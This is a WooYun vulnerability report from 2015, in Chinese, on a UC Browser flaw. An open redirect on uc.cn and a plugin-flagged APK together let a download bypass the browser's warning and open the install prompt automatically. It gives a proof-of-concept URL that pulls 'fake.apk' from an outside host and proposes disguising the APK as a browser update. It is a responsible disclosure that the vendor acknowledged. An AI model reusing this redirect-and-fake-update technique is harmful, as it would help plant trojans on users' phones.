当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106283

漏洞标题:UC浏览器某缺陷可能导致手机被植入木马

相关厂商:UC Mobile

漏洞作者: Lyleaks

提交时间:2015-04-07 04:24

修复时间:2015-07-06 16:28

公开时间:2015-07-06 16:28

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-07: 细节已通知厂商并且等待厂商处理中
2015-04-07: 厂商已经确认,细节仅向厂商公开
2015-04-10: 细节向第三方安全合作伙伴开放
2015-06-01: 细节向核心白帽子及相关领域专家公开
2015-06-11: 细节向普通白帽子公开
2015-06-21: 细节向实习白帽子公开
2015-07-06: 细节向公众公开

简要描述:

UC浏览器某缺陷可能导致手机被植入木马

详细说明:

UC浏览器默认下载APK时会有提示框

Screenshot_2015-04-06-14-11-46.png


并且下载完成之后不会自动进入安装界面

Screenshot_2015-04-06-14-12-29.png


但是在插件中心下载插件时发现,当点击安装时,不会有提示框,并且下载完成之后会自动进入安装界面。
查看源码时发现,下载APK的URL为

1.jpg


但是在非*.uc.cn域下无法直接访问该URL,所以我找了个*.uc.cn域下的URL跳转来绕过限制。

http://app.uc.cn/appstore/AppCenter/api/activate_uc?uc_param_str=nieidnutssvebipfcp&src=uc_video&dest_url=ext:uc_dw:http://addondl.uc.cn/resources/pkg/thunder.apk


访问上面的URL,会自动下载thunder.apk并进入安装界面

Screenshot_2015-04-06-14-20-31.png


Screenshot_2015-04-06-14-20-57.png


但是当我把下载地址改成我自己服务器上的APK时,发现下载完成之后并不会自动进入安装界面。
刚开始以为只有从uc.cn下载的APK才会自动进入安装界面,但是后来我把下载的插件传到我的服务器上下载时,发现也可以。所以不是下载地址地问题,而是APK的问题。
搜索了一下UC浏览器的插件,找到了开发文档,发现只有APK被浏览器识别为插件时,才会自动进入安装界面。

2.jpg


所以在AndroidManifest.xml加入上面代码。
要让用户安装,我们可以伪装成浏览器更新。
一般用户看到是在uc.cn域下的,并且提示更新,大部分都会点击安装。

Screenshot_2015-04-06-20-10-33.png


Screenshot_2015-04-06-20-10-55.png

漏洞证明:

访问下面的URL

http://app.uc.cn/appstore/AppCenter/api/activate_uc?uc_param_str=nieidnutssvebipfcp&src=uc_video&dest_url=ext%3Auc_dw%3Ahttp%3A%2F%2Fsandboxs-sandbox.stor.sinaapp.com%2Ffake.apk


浏览器会提示安装

Screenshot_2015-04-06-20-10-33.png

修复方案:

版权声明:转载请注明来源 Lyleaks@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-04-07 16:26

厂商回复:

漏洞存在,已转给相关人员处理,非常感谢!

最新状态:

暂无